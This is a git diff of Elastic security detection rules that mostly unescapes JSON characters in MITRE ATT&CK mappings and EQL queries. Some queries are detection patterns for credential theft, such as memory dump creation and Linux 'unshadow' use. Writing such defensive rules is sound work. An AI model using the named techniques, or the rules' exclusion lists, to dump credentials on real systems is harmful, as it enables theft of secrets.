a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json index d41a7104fdb..f1fab0151c1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_103.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json index c0c3af88a09..c5c0c78409f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c1a552-7776-44ad-ae0f-8746cc07773c_104.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json index 2a5cd70449e..d7d9e87fa18 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_102.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json index e75eee67df7..19a5e7419fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json index d3e0ef1f2fa..4b659e01c3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_104.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json index ab22591162e..4d0f6181e1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e6c98d38-633d-4b3e-9387-42112cd5ac10_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json index c32c461e977..ff5b97b4600 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_102.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json index 18ca41ad989..246476bfbf3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_103.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json index 84f1b3d48c1..80552901052 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_104.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json index b12c5acb858..14b5d022c55 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e3ecff-03dd-48ec-acbd-54a04de10c68_205.json @@ -47,7 +47,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json index 65169f48f31..a4aee34adb9 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_102.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json index 04ebd69fdca..05aaace2016 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_103.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json index 41b6b465366..85d92651cf1 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_104.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json index d57a3c38434..673b9984a77 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_105.json @@ -68,7 +68,7 @@ ], "risk_score": 47, "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json index 9772bdfe259..50b7a07f189 100644 --- a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_106.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json index e91b3536946..c9d31ac0a2c 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json +++ b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json index 7e008eaf003..5cf18ae1ff0 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json index 42a42a34887..e22e1ce6404 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e7075e8d-a966-458e-a183-85cd331af255_104.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json index 77e6edde69c..7c989bddc32 100644 --- a/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Credential Access via Memory Dump File Creation", - "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n /* MDMP header */\n file.Ext.header_bytes : \"4d444d50*\" and file.size \u003e= 30000 and\n not\n\n (\n (\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WUDFHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Taskmgr.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\zCrashReport64.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n file.path : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\WDF\\\\*\",\n \"?:\\\\ProgramData\\\\Alteryx\\\\ErrorLogs\\\\*\",\n \"?:\\\\ProgramData\\\\Goodix\\\\*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\logs\\\\zoomcrash*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\Crashpad\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\crashpaddb\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\HungReports\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\NativeCrashReporting\\\\*\"\n ) and (process.code_signature.trusted == true or process.executable == null)\n )\n )\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n /* MDMP header */\n file.Ext.header_bytes : \"4d444d50*\" and file.size >= 30000 and\n not\n\n (\n (\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WUDFHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Taskmgr.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\zCrashReport64.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n file.path : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\WDF\\\\*\",\n \"?:\\\\ProgramData\\\\Alteryx\\\\ErrorLogs\\\\*\",\n \"?:\\\\ProgramData\\\\Goodix\\\\*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\logs\\\\zoomcrash*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\Crashpad\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\crashpaddb\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\HungReports\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\NativeCrashReporting\\\\*\"\n ) and (process.code_signature.trusted == true or process.executable == null)\n )\n )\n", "related_integrations": [ { "package": "endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json index de2043dbaf0..d65c12d9480 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_103.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json index 000a6651be2..b57371ac9ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_104.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json index 91d84336144..b7d75df8a1f 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_105.json @@ -80,7 +80,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json index fea5d6be95e..5b2252426a3 100644 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_105.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json index 12a04ff6933..6789a2c6771 100644 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_2.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json index 14208605bcf..52e3636d2ab 100644 --- a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_4.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json index 7ca39de3fc9..c640a87d179 100644 --- a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_1.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json index dd45cd492f2..0a1be102242 100644 --- a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_2.json @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json index 70b3fada847..030106c8c65 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action == \"exec\" and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action == \"exec\" and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json index 9934f741319..b48ad34a369 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json index b1d64f3b7e1..52f2f5c7256 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_3.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json index 6bc62a59ebf..e490b24cead 100644 --- a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_4.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Linux Credential Dumping via Unshadow", - "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count \u003e= 2\n", + "query": "process where host.os.type == \"linux\" and process.name == \"unshadow\" and\n event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and process.args_count >= 2\n", "references": [ "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" ], @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git 